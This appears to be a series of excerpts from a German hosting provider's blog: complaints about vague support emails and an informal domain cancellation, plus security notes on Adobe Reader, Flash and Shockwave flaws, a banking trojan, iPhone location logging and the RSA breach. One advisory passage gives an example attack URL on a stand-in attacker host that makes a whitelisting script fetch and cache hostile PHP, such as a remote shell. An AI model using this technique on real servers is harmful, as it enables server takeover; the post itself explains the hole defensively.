Anders sind E-Mails wie

Lieber Support

Ich habe ein Problem, können Sie mir helfen?

Mit freundlichen Gruß

oder

[....] Seit Anfang dieser Wochen scheinen uns diverse Mails nicht mehr zu erreichen.
Dier Mailverkehr ist um rund 50% rückläufig, was nicht durch die Vorweihnachtszeit
zu erklären sein dürfte. Was können wir tun?

nicht zu erklären, oder?

Liebe Kunden. Wir helfen gerne, aber: Leider haben wir unsere Kristallkugeln schon für die allfälligen Bäume vorgesehen.  

Verschärft wird das Problem wie immer noch dadurch, daß die Sicherheitslücke schon vor Veröffentlichung des Warnhinweises “in the wild” mißbraucht wird. Eine Lösung des Problems kann Adobe derzeit noch nicht anbieten, doch es wird empfohlen, den “geschützten Modus” bei den betroffenen Software-Versionen zu aktivieren.

Als betroffen werden genannt: Adobe Reader X (10.1.1) sowie frühere Versionen für Windows und Macintosh, Adobe Reader 9.4.6 und frühere 9.x Versionen für UNIX sowie Adobe Acrobat X (10.1.1) und frühere Versionen für Windows und Macintosh. Ein Patch wird für spätestens kommende Woche angekündigt.

Zeitglich ist ein Update für den Shockwave Player veröffentlicht worden, das sieben kritische Lücken schließt. In Photoshop CS5 und 5.1 fixt Adobe mit einem Update ein Problem mit GIFs, das sich zum Einschleusen und Ausführen von Code missbrauchen lässt.

Ruft ein Angreifer das Script mit dem URL-Parameter http://flickr.com.boesehackersite.tld/badscript.php auf, führt dies zu einem Whitelist-Treffer für die vertrauenswürdige Domain flickr.com. Dabei lädt das Script aber die PHP-Datei badscript.php vom Server boesehackersite.tld in sein öffentlich erreichbares Cache-Verzeichnis. Von dort aus kann die eingeschleuste PHP-Datei nun von jedermann gestartet werden. Handelt es sich bei dem Script z.B. um eine Remote Shell könnte ein Angreifer auf diesem Weg die Kontrolle über den Server gewinnen.

Unsere Empfehlung: Updaten und dann -wie es der gesunde Menschenverstand schon vorschreibt- keine Domains in die Whiteliste aufnehmen.

Der Trojaner manipuliert die Online-Banking-Seite so, dass ein Geldeingang in der Saldoübersicht angezeigt wird. Tatsächlich ist dies aber nicht der Fall, erklärt das BKA. Wer der Aufforderung zur Rücküberweisung folgt, bekommt das gewohnte, jedoch vollständig ausgefüllte Online-Überweisungsformular angezeigt. Dies sollte keinesfalls bestätigt und abgeschickt werden, da sonst Geld auf die Konten der Täter überwiesen wird. Die üblichen Sicherungsmechanismen beim Online-Banking greifen in diesem Fall nicht, weil der Nutzer selbst die Überweisung tätigt, warnt die Behörde.

Damit solche Schadsoftware erst gar nicht auf Ihren Rechner gelangt, sollten Sie IMMER nur mit aktueller Antivirensoftware surfen. Professionelle Antiviren-Software wie Kaspersky Antivirus
bietet dabei auch noch einen speziellen Sandkasten-Modus (die sogenannte Sichere Umgebung), in dem Sie z.B. Bankgeschäfte noch sicherer durchführen oder auch gefahrlos auf unbekannten Seiten surfen können.

Das iPhone zeichnet ständig auf, wo sich der Nutzer aufhält – und speichert diese Information zusammen mit detaillierten Zeitangaben in eine Datei auf dem Telefon. Schließt man das iPhone an den Rechner an und startet eine Synchronisierung, wird die Datei auf den Computer überspielt –natürlich unverschlüsselt. Dort kann sie praktisch von jedem ausgelesen werden, der Zugang zu dem Gerät hat. Im Moment ist auch noch nicht klar, inwieweit diese Datei an Apple/iTune übertragen wird.

Nebenbei, bei uns ist seit einiger Zeit iPad/iPhone-freie Zone.

—————————————————————————————
Callback from ***** ************ 05.04.2011 15.45 ****@*********** 0470****** Sehr geeherte Damen und Herren,
hiermit kündige ich zum nächst-möglichen Zeitpunkt meine bei Ihnen geführten Domians bzw. bitte ich den Umzug zu Strato zu vollziehen.
Dafür benötige ich von Ihnen den AuthInfo Code und bitte Sie diesen an meine o.g. Email-Adresse sowie die entsprechende Bestätigung der Kündigung und die Fristen zu zusenden.

Mit freundlichen Grüßen
**** ********
—————————————————————————————

In zivilisierten Ländern (u.A. damit auch in Deutschland) vollzieht man Kündigungen in Schriftform und nicht per Callback-Formular. Zumindest steht dies bei uns so auch seit Anbeginn in freundlicher Hommage an anständige Geschäftspraktiken in unseren AGB.

Laut Uri Rivner gelang der Einbruch über eine Backdoor, die über infizierte E-Mail installiert wurde. Die E-Mails enthielten im Anhang eine Exceltabelle, in der wiederum eine präparierte Flash-Datei eingebettet war. Beim Öffnen der Tabelle startete der Flash Player zum Abspielen das Flash-Applets. Durch einen der ungezählten Fehler in Flash war es dann möglich, Code in das System einzuschleusen und diesen zu starten.

Was lernen wir daraus? Flashfrei ist sicherer, denn es wird noch Jahre daueren, bis zumindest die gröbsten Sicherheitslücken entfernt sind…

Betroffen ist der Flash Player in den jeweils aktuellen Versionen 10.x für Windows, Mac, Linux, Android sowie das in Chrome eingebettete Flash-Plug-in. Daneben sind auch der Adobe Reader und Acrobat für Windows und Mac jeweils in den Versionen 10.x und 9.x verwundbar, weil derselbe Fehler in deren integrierter Flash-Engine authplay.dll zu finden ist. Zumindest in der Windows-Version 10, die auch als X bekannt ist, lässt sich der Fehler jedoch nicht zum Kompromittieren eines Systems ausnutzen.

Nach Angaben von Kaspersky läuft der bei den bisherigen Attacken benutzte Exploit zwar unter Windows XP und Vista, nicht aber unter Windows 7 – was an den zusätzlichen Sicherheitsfunktionen (DEP, ASLR) liegt. Adobe arbeitet an einem Patch und will Updates für den Flash Player, Reader und Acrobat in der Woche nach dem 21.März veröffentlichen.